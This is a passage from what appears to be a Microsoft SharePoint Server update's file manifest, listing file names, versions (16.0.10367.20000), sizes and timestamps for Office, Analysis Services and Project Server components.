15-Sep-20| 12:00 \nscfeatr.xml| feature.xml| | 856| 15-Sep-20| 11:55 \nspelchek.xml| spellchecking.xml| | 1033| 15-Sep-20| 11:56 \nspelchk2.xml| spellchecking2.xml| | 2641| 15-Sep-20| 11:56 \ncms_tenantadmindeploymentlinksfeature_feature_xml| feature.xml| | 826| 15-Sep-20| 11:55 \ncms_tenantadmindeploymentlinksfeature_links_xml| links.xml| | 542| 15-Sep-20| 11:55 \ntopicplf.xml| feature.xml| | 732| 15-Sep-20| 12:03 \ntopicpf.xml| feature.xml| | 713| 15-Sep-20| 11:55 \nplnkfeat.xml| feature.xml| | 621| 15-Sep-20| 12:02 \npublcol.xml| publishedlinkscolumns.xml| | 1206| 15-Sep-20| 12:02 \npublctt.xml| publishedlinkscontenttypes.xml| | 948| 15-Sep-20| 12:02 \nv2vpblyfeat.xml| feature.xml| | 540| 15-Sep-20| 11:56 \nv2vpblyprovfil.xml| provisionedfiles.xml| | 1934| 15-Sep-20| 11:56 \nvwfrmlk.xml| feature.xml| | 794| 15-Sep-20| 11:59 \nxmlsfeat.xml| feature.xml| | 818| 15-Sep-20| 11:56 \nxmlsitem.xml| xmlsitemap.xml| | 624| 15-Sep-20| 11:55 \nmicrosoft.cobaltcore.dll| microsoft.cobaltcore.dll| 16.0.10367.20000| 3081640| 15-Sep-20| 11:56 \nmicrosoft.cobalt.base.dll| microsoft.cobalt.base.dll| 16.0.10367.20000| 874920| 15-Sep-20| 11:57 \nsystem.collections.immutable.dll| system.collections.immutable.dll| 4.6.23123.00| 193456| | \nupdate_system.collections.immutable.dll| system.collections.immutable.dll| 4.6.23123.00| 193456| 15-Sep-20| 11:57 \ncsisrv.dll| csisrv.dll| 16.0.10367.20000| 1283512| 15-Sep-20| 11:57 \ncsisrvexe.exe| csisrvexe.exe| 16.0.10367.20000| 328640| 15-Sep-20| 11:57 \nonfda.dll| onfda.dll| 16.0.10367.20000| 2096576| 15-Sep-20| 11:57 \ncolumnfiltering.ascx| columnfiltering.ascx| | 443| 15-Sep-20| 01:44 \ndocsettemplates.ascx| docsettemplates.ascx| | 1459| 15-Sep-20| 01:44 \nmetadatanavkeyfilters.ascx| metadatanavkeyfilters.ascx| | 4647| 15-Sep-20| 01:44 \nmetadatanavtree.ascx| metadatanavtree.ascx| | 2686| 15-Sep-20| 01:44 \nmultilangtemplates.ascx| transmgmtlibtemplates.ascx| | 3287| 15-Sep-20| 01:44 \nvideosettemplates.ascx| videosettemplates.ascx| | 1972| 15-Sep-20| 01:44 \neditdlg.htm_multilang| editdlg.htm| | 4796| 15-Sep-20| 01:44 \nfiledlg.htm_multilang| filedlg.htm| | 3344| 15-Sep-20| 01:44 \ndocsetversions.aspx| docsetversions.aspx| | 18741| 15-Sep-20| 01:44 \nediscoveryquerystatistics.ascx| ediscoveryquerystatistics.ascx| | 1357| 15-Sep-20| 01:44 \nediscoverytemplate.ascx| ediscoverytemplate.ascx| | 3267| 15-Sep-20| 01:44 \npdfirml.dll_0002| microsoft.office.irm.pdfprotectorlib.dll| 16.0.10367.20000| 1308568| 15-Sep-20| 01:44 \nmicrosoft.office.documentmanagement.dll| microsoft.office.documentmanagement.dll| 16.0.10367.20000| 572312| 15-Sep-20| 01:44 \nmicrosoft.office.documentmanagement.dll_isapi| microsoft.office.documentmanagement.dll| 16.0.10367.20000| 572312| 15-Sep-20| 01:44 \nbarcodeglobalsettings.ascx| barcodeglobalsettings.ascx| | 1473| 15-Sep-20| 01:44 \nbargensettings.ascx| bargensettings.ascx| | 1523| 15-Sep-20| 01:44 \ndropoffzoneroutingform.ascx| dropoffzoneroutingform.ascx| | 3528| 15-Sep-20| 01:44 \ndefault.aspx_edcons| default.aspx| | 4619| 15-Sep-20| 01:44 \nrecordsribbon.ascx| recordsribbon.ascx| | 367| 15-Sep-20| 01:44 \nmicrosoft.office.policy.dll| microsoft.office.policy.dll| 16.0.10367.20000| 2382728| 15-Sep-20| 01:44 \nmicrosoft.office.policy.dll_isapi| microsoft.office.policy.dll| 16.0.10367.20000| 2382728| 15-Sep-20| 01:44 \nmicrosoft.office.policy.pages.dll| microsoft.office.policy.pages.dll| 16.0.10367.20000| 540056| 15-Sep-20| 01:44 \nauditcustquery.ascx| auditcustomquery.ascx| | 11154| 15-Sep-20| 01:44 \nauditsettings.ascx| auditsettings.ascx| | 3594| 15-Sep-20| 01:44 \nbarcodesettings.ascx| barcodesettings.ascx| | 1399| 15-Sep-20| 01:44 \ndiscoveryglobalcontrol.ascx| discoveryglobalcontrol.ascx| | 5175| 15-Sep-20| 01:44 \ndiscoveryproperties.ascx| discoveryproperties.ascx| | 7132| 15-Sep-20| 01:44 \ndiscoveryquerystatistics.ascx| discoveryquerystatistics.ascx| | 3788| 15-Sep-20| 01:44 \ndlptemplatepicker.ascx| dlptemplatepicker.ascx| | 3594| 15-Sep-20| 01:44 \nlabelsettings.ascx| labelsettings.ascx| | 9510| 15-Sep-20| 01:44 \nretentionsettings.ascx| retentionsettings.ascx| | 11060| 15-Sep-20| 01:44 \ndw20.exe_0001| dw20.exe| 16.0.10367.20000| 2129344| 15-Sep-20| 12:03 \ndwtrig20.exe| dwtrig20.exe| 16.0.10367.20000| 318936| 15-Sep-20| 12:03 \nconversion.office.gfxserver.dll| gfxserver.dll| 16.0.10367.20000| 5274536| 15-Sep-20| 11:56 \nppt.conversion.gfxserver.dll| gfxserver.dll| 16.0.10367.20000| 5274536| 15-Sep-20| 11:56 \nppt.edit.gfxserver.dll| gfxserver.dll| 16.0.10367.20000| 5274536| 15-Sep-20| 11:56 \nwac.office.gfxserver.dll| gfxserver.dll| 16.0.10367.20000| 5274536| 15-Sep-20| 11:56 \nconversion.igxserver.dll| igxserver.dll| 16.0.10367.20000| 12129168| 15-Sep-20| 12:04 \nppt.conversion.igxserver.dll| igxserver.dll| 16.0.10367.20000| 12129168| 15-Sep-20| 12:04 \nppt.edit.igxserver.dll| igxserver.dll| 16.0.10367.20000| 12129168| 15-Sep-20| 12:04 \nwac.office.igxserver.dll| igxserver.dll| 16.0.10367.20000| 12129168| 15-Sep-20| 12:04 \nsltemp.asc| sldlibtemplates.ascx| | 12554| 15-Sep-20| 12:04 \nsldlib.js| sldlib.js| | 29295| 15-Sep-20| 12:04 \neditdlg.htm_slfeat| editdlg.htm| | 4796| 15-Sep-20| 11:57 \nfiledlg.htm_slfeat| filedlg.htm| | 3344| 15-Sep-20| 11:57 \nclientx.dll| microsoft.office.sharepoint.clientextensions.dll| 16.0.10367.20000| 381904| 15-Sep-20| 12:04 \nclientxr.dll.x64| microsoft.office.sharepoint.clientextensions.dll| 16.0.10367.20000| 381904| 15-Sep-20| 12:04 \nmicrosoft.office.server.chart.dll| microsoft.office.server.chart.dll| 16.0.10367.20000| 603064| 15-Sep-20| 12:07 \nmicrosoft.office.server.chart_gac.dll| microsoft.office.server.chart.dll| 16.0.10367.20000| 603064| 15-Sep-20| 12:07 \nas_adal_dll_32.b77a7d1e_2d54_42cb_81a8_c5262ccc792b| adal.dll| | 1456656| 24-Aug-20| 11:13 \nas_adal_dll_64.b77a7d1e_2d54_42cb_81a8_c5262ccc792b| adal.dll| | 1784544| 24-Aug-20| 11:12 \nas_azureclient_dll_32.b77a7d1e_2d54_42cb_81a8_c5262ccc792b| microsoft.analysisservices.azureclient.dll| | 316496| 24-Aug-20| 11:12 \nas_azureclient_dll_64.b77a7d1e_2d54_42cb_81a8_c5262ccc792b| microsoft.analysisservices.azureclient.dll| | 316496| 24-Aug-20| 11:12 \nas_client_db2v0801_xsl_32.b77a7d1e_2d54_42cb_81a8_c5262ccc792b| db2v0801.xsl| | 30717| 24-Aug-20| 11:12 \nas_client_db2v0801_xsl_64.b77a7d1e_2d54_42cb_81a8_c5262ccc792b| db2v0801.xsl| | 30717| 24-Aug-20| 11:12 \nas_client_hive_xsl_32.b77a7d1e_2d54_42cb_81a8_c5262ccc792b| hive.xsl| | 81782| 24-Aug-20| 11:12 \nas_client_hive_xsl_64.b77a7d1e_2d54_42cb_81a8_c5262ccc792b| hive.xsl| | 81782| 24-Aug-20| 11:12 \nas_client_msql_xsl_32.b77a7d1e_2d54_42cb_81a8_c5262ccc792b| msql.xsl| | 128792| 24-Aug-20| 11:12 \nas_client_msql_xsl_64.b77a7d1e_2d54_42cb_81a8_c5262ccc792b| msql.xsl| | 128792| 24-Aug-20| 11:12 \nas_client_orcl7_xsl_32.b77a7d1e_2d54_42cb_81a8_c5262ccc792b| orcl7.xsl| | 95739| 24-Aug-20| 11:12 \nas_client_orcl7_xsl_64.b77a7d1e_2d54_42cb_81a8_c5262ccc792b| orcl7.xsl| | 95739| 24-Aug-20| 11:12 \nas_client_sqlpdw_xsl_32.b77a7d1e_2d54_42cb_81a8_c5262ccc792b| sqlpdw.xsl| | 105635| 24-Aug-20| 11:12 \nas_client_sqlpdw_xsl_64.b77a7d1e_2d54_42cb_81a8_c5262ccc792b| sqlpdw.xsl| | 105635| 24-Aug-20| 11:12 \nas_client_trdtv2r41_xsl_32.b77a7d1e_2d54_42cb_81a8_c5262ccc792b| trdtv2r41.xsl| | 105800| 24-Aug-20| 11:12 \nas_client_trdtv2r41_xsl_64.b77a7d1e_2d54_42cb_81a8_c5262ccc792b| trdtv2r41.xsl| | 105800| 24-Aug-20| 11:12 \nas_client_xmsrv_dll_32.b77a7d1e_2d54_42cb_81a8_c5262ccc792b| xmsrv.dll| | 35081808| 24-Aug-20| 11:12 \nas_client_xmsrv_dll_64.b77a7d1e_2d54_42cb_81a8_c5262ccc792b| xmsrv.dll| | 25498704| 24-Aug-20| 11:12 \nas_clientas80_xsl_32.b77a7d1e_2d54_42cb_81a8_c5262ccc792b| as80.xsl| | 17484| 24-Aug-20| 11:13 \nas_clientas80_xsl_64.b77a7d1e_2d54_42cb_81a8_c5262ccc792b| as80.xsl| | 17484| 24-Aug-20| 11:13 \nas_clientas90_xsl_32.b77a7d1e_2d54_42cb_81a8_c5262ccc792b| as90.xsl| | 20021| 24-Aug-20| 11:12 \nas_clientas90_xsl_64.b77a7d1e_2d54_42cb_81a8_c5262ccc792b| as90.xsl| | 20021| 24-Aug-20| 11:12 \nas_clientinformix_xsl_32.b77a7d1e_2d54_42cb_81a8_c5262ccc792b| informix.xsl| | 32145| 24-Aug-20| 11:12 \nas_clientinformix_xsl_64.b77a7d1e_2d54_42cb_81a8_c5262ccc792b| informix.xsl| | 32145| 24-Aug-20| 11:12 \nas_clientmsjet_xsl_32.b77a7d1e_2d54_42cb_81a8_c5262ccc792b| msjet.xsl| | 30427| 24-Aug-20| 11:12 \nas_clientmsjet_xsl_64.b77a7d1e_2d54_42cb_81a8_c5262ccc792b| msjet.xsl| | 30427| 24-Aug-20| 11:12 \nas_clientmsmgdsrv_dll_32.b77a7d1e_2d54_42cb_81a8_c5262ccc792b| msmgdsrv.dll| | 7638824| 24-Aug-20| 11:13 \nas_clientmsmgdsrv_dll_64.b77a7d1e_2d54_42cb_81a8_c5262ccc792b| msmgdsrv.dll| | 9328720| 24-Aug-20| 11:12 \nas_clientsql120_xsl_32.b77a7d1e_2d54_42cb_81a8_c5262ccc792b| sql120.xsl| | 135247| 24-Aug-20| 11:12 \nas_clientsql120_xsl_64.b77a7d1e_2d54_42cb_81a8_c5262ccc792b| sql120.xsl| | 135247| 24-Aug-20| 11:12 \nas_clientsql2000_xsl_32.b77a7d1e_2d54_42cb_81a8_c5262ccc792b| sql2000.xsl| | 35014| 24-Aug-20| 11:12 \nas_clientsql2000_xsl_64.b77a7d1e_2d54_42cb_81a8_c5262ccc792b| sql2000.xsl| | 35014| 24-Aug-20| 11:12 \nas_clientsql70_xsl_32.b77a7d1e_2d54_42cb_81a8_c5262ccc792b| sql70.xsl| | 33181| 24-Aug-20| 11:12 \nas_clientsql70_xsl_64.b77a7d1e_2d54_42cb_81a8_c5262ccc792b| sql70.xsl| | 33181| 24-Aug-20| 11:12 \nas_clientsql90_xsl_32.b77a7d1e_2d54_42cb_81a8_c5262ccc792b| sql90.xsl| | 136426| 24-Aug-20| 11:12 \nas_clientsql90_xsl_64.b77a7d1e_2d54_42cb_81a8_c5262ccc792b| sql90.xsl| | 136426| 24-Aug-20| 11:12 \nas_clientsybase_xsl_32.b77a7d1e_2d54_42cb_81a8_c5262ccc792b| sybase.xsl| | 30964| 24-Aug-20| 11:12 \nas_clientsybase_xsl_64.b77a7d1e_2d54_42cb_81a8_c5262ccc792b| sybase.xsl| | 30964| 24-Aug-20| 11:12 \nas_msmdlocal_dll_32.b77a7d1e_2d54_42cb_81a8_c5262ccc792b| msmdlocal.dll| | 45813840| 24-Aug-20| 11:12 \nas_msmdlocal_dll_64.b77a7d1e_2d54_42cb_81a8_c5262ccc792b| msmdlocal.dll| | 63495968| 24-Aug-20| 11:13 \nas_msolap_dll_32.b77a7d1e_2d54_42cb_81a8_c5262ccc792b| msolap.dll| | 7999272| 24-Aug-20| 11:12 \nas_msolap_dll_64.b77a7d1e_2d54_42cb_81a8_c5262ccc792b| msolap.dll| | 10331936| 24-Aug-20| 11:13 \nas_msolui_dll_32.b77a7d1e_2d54_42cb_81a8_c5262ccc792b| msolui.dll| | 292128| 24-Aug-20| 11:13 \nas_msolui_dll_64.b77a7d1e_2d54_42cb_81a8_c5262ccc792b| msolui.dll| | 312616| 24-Aug-20| 11:12 \nas_sqldumper_exe_32.b77a7d1e_2d54_42cb_81a8_c5262ccc792b| sqldumper.exe| | 147560| 24-Aug-20| 11:12 \nas_sqldumper_exe_64.b77a7d1e_2d54_42cb_81a8_c5262ccc792b| sqldumper.exe| | 172368| 24-Aug-20| 11:13 \nas_xmlrw_dll_32.b77a7d1e_2d54_42cb_81a8_c5262ccc792b| xmlrw.dll| | 289376| 24-Aug-20| 11:12 \nas_xmlrw_dll_64.b77a7d1e_2d54_42cb_81a8_c5262ccc792b| xmlrw.dll| | 333928| 24-Aug-20| 11:12 \nas_xmlrwbin_dll_32.b77a7d1e_2d54_42cb_81a8_c5262ccc792b| xmlrwbin.dll| | 194152| 24-Aug-20| 11:13 \nas_xmlrwbin_dll_64.b77a7d1e_2d54_42cb_81a8_c5262ccc792b| xmlrwbin.dll| | 224864| 24-Aug-20| 11:12 \nconversion.office.mso99lres.dll| mso99lres.dll| 16.0.10367.20000| 14548896| 15-Sep-20| 11:59 \nppt.conversion.mso99lres.dll| mso99lres.dll| 16.0.10367.20000| 14548896| 15-Sep-20| 11:59 \nppt.edit.mso99lres.dll| mso99lres.dll| 16.0.10367.20000| 14548896| 15-Sep-20| 11:59 \nwac.office.mso99lres.dll| mso99lres.dll| 16.0.10367.20000| 14548896| 15-Sep-20| 11:59 \nconversion.office.mso20win32server.dll| mso20win32server.dll| 16.0.10367.20000| 4399016| 15-Sep-20| 11:58 \nmso.mso20win32server.dll| mso20win32server.dll| 16.0.10367.20000| 4399016| 15-Sep-20| 11:58 \nppt.conversion.mso20win32server.dll| mso20win32server.dll| 16.0.10367.20000| 4399016| 15-Sep-20| 11:58 \nppt.edit.mso20win32server.dll| mso20win32server.dll| 16.0.10367.20000| 4399016| 15-Sep-20| 11:58 \nwac.office.mso20win32server.dll| mso20win32server.dll| 16.0.10367.20000| 4399016| 15-Sep-20| 11:58 \nconversion.office.mso30win32server.dll| mso30win32server.dll| 16.0.10367.20000| 5584808| 15-Sep-20| 12:04 \nmso.mso30win32server.dll| mso30win32server.dll| 16.0.10367.20000| 5584808| 15-Sep-20| 12:04 \nppt.conversion.mso30win32server.dll| mso30win32server.dll| 16.0.10367.20000| 5584808| 15-Sep-20| 12:04 \nppt.edit.mso30win32server.dll| mso30win32server.dll| 16.0.10367.20000| 5584808| 15-Sep-20| 12:04 \nwac.office.mso30win32server.dll| mso30win32server.dll| 16.0.10367.20000| 5584808| 15-Sep-20| 12:04 \nconversion.office.mso40uiwin32server.dll| mso40uiwin32server.dll| 16.0.10367.20000| 12483496| 15-Sep-20| 11:59 \nppt.conversion.mso40uiwin32server.dll| mso40uiwin32server.dll| 16.0.10367.20000| 12483496| 15-Sep-20| 11:59 \nppt.edit.mso40uiwin32server.dll| mso40uiwin32server.dll| 16.0.10367.20000| 12483496| 15-Sep-20| 11:59 \nwac.office.mso40uiwin32server.dll| mso40uiwin32server.dll| 16.0.10367.20000| 12483496| 15-Sep-20| 11:59 \nconversion.office.mso98win32server.dll| mso98win32server.dll| 16.0.10367.20000| 3950504| 15-Sep-20| 12:06 \nppt.conversion.mso98win32server.dll| mso98win32server.dll| 16.0.10367.20000| 3950504| 15-Sep-20| 12:06 \nppt.edit.mso98win32server.dll| mso98win32server.dll| 16.0.10367.20000| 3950504| 15-Sep-20| 12:06 \nwac.office.mso98win32server.dll| mso98win32server.dll| 16.0.10367.20000| 3950504| 15-Sep-20| 12:06 \nconversion.office.msoserver.dll| msoserver.dll| 16.0.10367.20000| 14474152| 15-Sep-20| 12:04 \nppt.conversion.msoserver.dll| msoserver.dll| 16.0.10367.20000| 14474152| 15-Sep-20| 12:04 \nppt.edit.msoserver.dll| msoserver.dll| 16.0.10367.20000| 14474152| 15-Sep-20| 12:04 \nwac.office.msoserver.dll| msoserver.dll| 16.0.10367.20000| 14474152| 15-Sep-20| 12:04 \nconversion.office.msores.dll| msores.dll| 16.0.10367.20000| 73689000| 15-Sep-20| 11:59 \nppt.conversion.msores.dll| msores.dll| 16.0.10367.20000| 73689000| 15-Sep-20| 11:59 \nppt.edit.msores.dll| msores.dll| 16.0.10367.20000| 73689000| 15-Sep-20| 11:59 \nwac.office.msores.dll| msores.dll| 16.0.10367.20000| 73689000| 15-Sep-20| 11:59 \nmicrosoft.office.web.environment.officeserver.dll| microsoft.office.web.environment.officeserver.dll| 16.0.10367.20000| 55760| 15-Sep-20| 12:07 \nmicrosoft.office.web.common.dll| microsoft.office.web.common.dll| 16.0.10367.20000| 1973168| 15-Sep-20| 12:06 \nnl7data0011.dll_osssearch| nl7data0011.dll| 16.0.10367.20000| 7782888| 15-Sep-20| 12:07 \nnl7data0404.dll_osssearch| nl7data0404.dll| 16.0.10367.20000| 2708480| 15-Sep-20| 12:07 \nnl7data0804.dll_osssearch| nl7data0804.dll| 16.0.10367.20000| 3588096| 15-Sep-20| 12:07 \nconversion.oartodfserver.dll| oartodfserver.dll| 16.0.10367.20000| 3555752| 15-Sep-20| 12:05 \nppt.conversion.oartodfserver.dll| oartodfserver.dll| 16.0.10367.20000| 3555752| 15-Sep-20| 12:05 \nppt.edit.oartodfserver.dll| oartodfserver.dll| 16.0.10367.20000| 3555752| 15-Sep-20| 12:05 \nwac.office.oartodfserver.dll| oartodfserver.dll| 16.0.10367.20000| 3555752| 15-Sep-20| 12:05 \nconversion.office.oartserver.dll| oartserver.dll| 16.0.10367.20000| 18202024| 15-Sep-20| 12:05 \nppt.conversion.oartserver.dll| oartserver.dll| 16.0.10367.20000| 18202024| 15-Sep-20| 12:05 \nppt.edit.oartserver.dll| oartserver.dll| 16.0.10367.20000| 18202024| 15-Sep-20| 12:05 \nwac.office.oartserver.dll| oartserver.dll| 16.0.10367.20000| 18202024| 15-Sep-20| 12:05 \nmicrosoft.office.connectedservices.identity.dll| microsoft.office.connectedservices.identity.dll| 16.0.10367.20000| 62888| 15-Sep-20| 11:58 \nconversion.cultures.office.odf| office.odf| | 2224568| 15-Sep-20| 12:04 \noffice.odf| office.odf| | 2224568| 15-Sep-20| 12:04 \nppt.conversion.cultures.office.odf| office.odf| | 2224568| 15-Sep-20| 12:04 \nvisioserver.cultures.office.odf| office.odf| | 2224568| 15-Sep-20| 12:04 \nwac.conversion.cultures.office.odf| office.odf| | 2224568| 15-Sep-20| 12:04 \nwac.powerpoint.edit.bin.cultures.office.odf| office.odf| | 2224568| 15-Sep-20| 12:04 \nxlsrv.ecs.culture.office.odf| office.odf| | 2224568| 15-Sep-20| 12:04 \nxlsrv.ecs.office.odf| office.odf| | 2224568| 15-Sep-20| 12:04 \nhtmlchkr.dll.x64| htmlchkr.dll| 16.0.10367.20000| 1149376| 15-Sep-20| 11:58 \nconversionhtmlutil.dll| htmlutil.dll| 16.0.10367.20000| 2855336| 15-Sep-20| 11:58 \nbusdata.dll| microsoft.businessdata.dll| 16.0.10367.20000| 120792| 15-Sep-20| 11:58 \nbusdatar.dll.x64| microsoft.businessdata.dll| 16.0.10367.20000| 120792| 15-Sep-20| 11:58 \nonetnative.dll| onetnative.dll| 16.0.10367.20000| 811960| 15-Sep-20| 11:59 \nonetnative_1.dll| onetnative.dll| 16.0.10367.20000| 811960| 15-Sep-20| 11:59 \nonetutil.dll| onetutil.dll| 16.0.10367.20000| 2866096| 15-Sep-20| 11:58 \nconversion.office.osfserver.dll| osfserver.dll| 16.0.10367.20000| 164264| 15-Sep-20| 12:06 \nwac.office.osfserver.dll| osfserver.dll| 16.0.10367.20000| 164264| 15-Sep-20| 12:06 \nconversion.office.osfsharedserver.dll| osfsharedserver.dll| 16.0.10367.20000| 734120| 15-Sep-20| 12:07 \nwac.office.osfsharedserver.dll| osfsharedserver.dll| 16.0.10367.20000| 734120| 15-Sep-20| 12:07 \nconversion.office.osfuiserver.dll| osfuiserver.dll| 16.0.10367.20000| 488360| 15-Sep-20| 12:06 \nwac.office.osfuiserver.dll| osfuiserver.dll| 16.0.10367.20000| 488360| 15-Sep-20| 12:06 \nosfserver_activities_dll.x64| microsoft.sharepoint.workflowservices.activities.dll| 16.0.10367.20000| 286152| 15-Sep-20| 11:59 \nosfserver_workflow_dll| microsoft.sharepoint.workflowservices.dll| 16.0.10367.20000| 487880| 15-Sep-20| 11:59 \nosfextap.dll| microsoft.sharepoint.officeextension.applicationpages.dll| 16.0.10367.20000| 16328| 15-Sep-20| 12:04 \noffice_extension_manager_js| sp.officeextensionmanager.js| | 50999| 15-Sep-20| 11:59 \nmicrosoft.office.serviceinfrastructure.runtime.dll| microsoft.office.serviceinfrastructure.runtime.dll| 16.0.10367.20000| 1053144| 15-Sep-20| 12:05 \nosrvadml.xml| officeserveradminlinks.xml| | 3483| 24-Aug-20| 11:20 \nugcdot.xml| feature.xml| | 629| 24-Aug-20| 11:21 \nmicrosoft.office.server.directory.sharepoint| microsoft.office.server.directory.sharepoint.dll| 16.0.10367.20000| 747472| 15-Sep-20| 11:59 \nmicrosoft.office.server.dll| microsoft.office.server.dll| 16.0.10367.20000| 3042216| 15-Sep-20| 11:59 \nmicrosoft.office.server.dll_isapi| microsoft.office.server.dll| 16.0.10367.20000| 3042216| 15-Sep-20| 11:59 \nmicrosoft.office.server.openxml.dll| microsoft.office.server.openxml.dll| 16.0.10367.20000| 1658296| 15-Sep-20| 11:59 \nmicrosoft.office.server.userprofiles.dll| microsoft.office.server.userprofiles.dll| 16.0.10367.20000| 5326264| 15-Sep-20| 11:59 \nmicrosoft.office.server.userprofiles.dll_isapi| microsoft.office.server.userprofiles.dll| 16.0.10367.20000| 5326264| 15-Sep-20| 11:59 \nmicrosoft.sharepoint.taxonomy.dll| microsoft.sharepoint.taxonomy.dll| 16.0.10367.20000| 1744304| 15-Sep-20| 11:59 \nmicrosoft.sharepoint.taxonomy.dll_gac| microsoft.sharepoint.taxonomy.dll| 16.0.10367.20000| 1744304| 15-Sep-20| 11:59 \nmicrosoft.sharepoint.taxonomy.dll_gac1| microsoft.sharepoint.taxonomy.dll| 16.0.10367.20000| 1744304| 15-Sep-20| 11:59 \nmicrosoft.office.server.userprofiles.proxy.dll| microsoft.office.server.userprofiles.dll| 16.0.10367.20000| 1465808| 15-Sep-20| 12:05 \nscriptresources.rsx| scriptresources.resx| | 18203| 15-Sep-20| 11:58 \nscriptforwebtaggingui.js| scriptforwebtaggingui.js| | 132939| 24-Aug-20| 11:11 \nsp.ui.taxonomy.js| sp.ui.taxonomy.js| | 46397| 24-Aug-20| 11:11 \nmediaplayer.xap| mediaplayer.xap| | 47680| 15-Sep-20| 02:01 \ndecompositiontree.xap| decompositiontree.xap| | 117374| 15-Sep-20| 02:01 \naddgal.xap| addgallery.xap| | 416734| 15-Sep-20| 02:01 \nwpgalim.xap| webpartgalleryimages.xap| | 109783| 15-Sep-20| 02:01 \naddgallery.xap_silverlight| addgallery.xap| | 382954| 15-Sep-20| 02:01 \nmicrosoft.sharepoint.client.xap| microsoft.sharepoint.client.xap| | 321008| 15-Sep-20| 02:01 \ndsigres.cab.x64| dsigres.cab| | 231369| 15-Sep-20| 02:01 \ndsigres.cab.x64_10266| dsigres.cab| | 231369| 15-Sep-20| 02:01 \ndsigres.cab.x64_1033| dsigres.cab| | 231369| 15-Sep-20| 02:01 \ndsigres.cab.x64_1087| dsigres.cab| | 231369| 15-Sep-20| 02:01 \ndsigctrl.cab.x64| dsigctrl.cab| | 481371| 15-Sep-20| 02:01 \ndsigres.cab.x86| dsigres.cab| | 191329| 15-Sep-20| 02:02 \ndsigres.cab.x86_10266| dsigres.cab| | 191329| 15-Sep-20| 02:02 \ndsigres.cab.x86_1033| dsigres.cab| | 191329| 15-Sep-20| 02:02 \ndsigres.cab.x86_1087| dsigres.cab| | 191329| 15-Sep-20| 02:02 \ndsigctrl.cab.x86| dsigctrl.cab| | 526489| 15-Sep-20| 02:02 \nmossbi.wfe.gac.scorecards.client.dll| microsoft.performancepoint.scorecards.client.dll| 16.0.10367.20000| 2226672| 15-Sep-20| 11:59 \nmossbi.wfe.gac.scorecards.servercommon.dll| microsoft.performancepoint.scorecards.servercommon.dll| 16.0.10367.20000| 333824| 15-Sep-20| 11:59 \nmossbi.wfe.gac.scorecards.webcontrols.dll| microsoft.performancepoint.scorecards.webcontrols.dll| 16.0.10367.20000| 338424| 15-Sep-20| 11:59 \nppt.conversion.ppserver.dll| ppserver.dll| 16.0.10367.20000| 12353464| 15-Sep-20| 12:05 \nppt.edit.ppserver.dll| ppserver.dll| 16.0.10367.20000| 12353464| 15-Sep-20| 12:05 \nppt.conversion.webclient.config| client.config| | 2059| 24-Aug-20| 11:14 \nppt.conversion.web.config| web.config| | 3375| 24-Aug-20| 11:14 \nmicrosoft.office.server.powerpoint.dll| microsoft.office.server.powerpoint.dll| 16.0.10367.20000| 108984| 15-Sep-20| 12:00 \npowerpointpowershell.format.ps1xml| powerpointpowershell.format.ps1xml| | 14378| 15-Sep-20| 12:05 \npjintl_1_new.dll| pjintl.dll| 16.0.10367.20000| 4898232| 15-Sep-20| 12:06 \nschedengine_new.exe| schedengine.exe| 16.0.10367.20000| 16457168| 15-Sep-20| 12:01 \nmicrosoft.projectserver.client.silverlight.dll| microsoft.projectserver.client.silverlight.dll| 16.0.10367.20000| 396192| 15-Sep-20| 12:04 \nmicrosoft.projectserver.client.phone.dll| microsoft.projectserver.client.phone.dll| 16.0.10367.20000| 396192| 15-Sep-20| 12:02 \ncontentdatabasecreate.sql| contentdatabasecreate.sql| | 8488378| 15-Sep-20| 12:05 \nmicrosoft.office.project.schema.dll| microsoft.office.project.schema.dll| 16.0.10367.20000| 6844328| 15-Sep-20| 12:00 \nmicrosoft.office.project.server.communications.dll| microsoft.office.project.server.communications.dll| 16.0.10367.20000| 371624| 15-Sep-20| 12:00 \nmicrosoft.office.project.server.communications.internal.dll| microsoft.office.project.server.communications.internal.dll| 16.0.10367.20000| 761256| 15-Sep-20| 12:00 \nmicrosoft.office.project.server.database.dll| microsoft.office.project.server.database.dll| 16.0.10367.20000| 10455464| 15-Sep-20| 11:59 \nmicrosoft.office.project.server.database.extension.dll| microsoft.office.project.server.database.extension.dll| 16.0.10367.20000| 4380072| 15-Sep-20| 12:00 \nmicrosoft.office.project.server.dll| microsoft.office.project.server.dll| 16.0.10367.20000| 9607592| 15-Sep-20| 12:00 \nmicrosoft.office.project.server.events.remote.dll| microsoft.office.project.server.events.remote.dll| 16.0.10367.20000| 59304| 15-Sep-20| 12:00 \nmicrosoft.office.project.server.inproc.dll| microsoft.office.project.server.inproc.dll| 16.0.10367.20000| 802216| 15-Sep-20| 12:00 \nmicrosoft.office.project.server.library.dll| microsoft.office.project.server.library.dll| 16.0.10367.20000| 1971624| 15-Sep-20| 12:00 \nsdk.microsoft.office.project.server.library.dll| microsoft.office.project.server.library.dll| 16.0.10367.20000| 1971624| 15-Sep-20| 12:00 \nmicrosoft.office.project.server.workflow.dll| microsoft.office.project.server.workflow.dll| 16.0.10367.20000| 196520| 15-Sep-20| 12:00 \nsdk.microsoft.office.project.server.workflow.dll| microsoft.office.project.server.workflow.dll| 16.0.10367.20000| 196520| 15-Sep-20| 12:00 \nmicrosoft.office.project.shared.dll| microsoft.office.project.shared.dll| 16.0.10367.20000| 1897376| 15-Sep-20| 11:59 \nsdk.microsoft.office.project.shared.dll| microsoft.office.project.shared.dll| 16.0.10367.20000| 1897376| 15-Sep-20| 11:59 \nmicrosoft.projectserver.client.dll| microsoft.projectserver.client.dll| 16.0.10367.20000| 396256| 15-Sep-20| 12:00 \nmicrosoft.projectserver.client.dll_001| microsoft.projectserver.client.dll| 16.0.10367.20000| 396256| 15-Sep-20| 12:00 \nmicrosoft.projectserver.dll| microsoft.projectserver.dll| 16.0.10367.20000| 888792| 15-Sep-20| 12:00 \nmicrosoft.projectserver.dll_001| microsoft.projectserver.dll| 16.0.10367.20000| 888792| 15-Sep-20| 12:00 \nmicrosoft.projectserver.serverproxy.dll| microsoft.projectserver.serverproxy.dll| 16.0.10367.20000| 1305048| 15-Sep-20| 12:00 \nps.csom.scriptclient.debug.js| ps.debug.js| | 1030292| 24-Aug-20| 11:24 \nps.csom.scriptclient.js| ps.js| | 623325| 24-Aug-20| 11:25 \nmicrosoft.office.project.server.pwa.applicationpages.dll| microsoft.office.project.server.pwa.applicationpages.dll| 16.0.10367.20000| 1051104| 15-Sep-20| 12:01 \nmicrosoft.office.project.server.pwa.dll| microsoft.office.project.server.pwa.dll| 16.0.10367.20000| 2758624| 15-Sep-20| 12:01 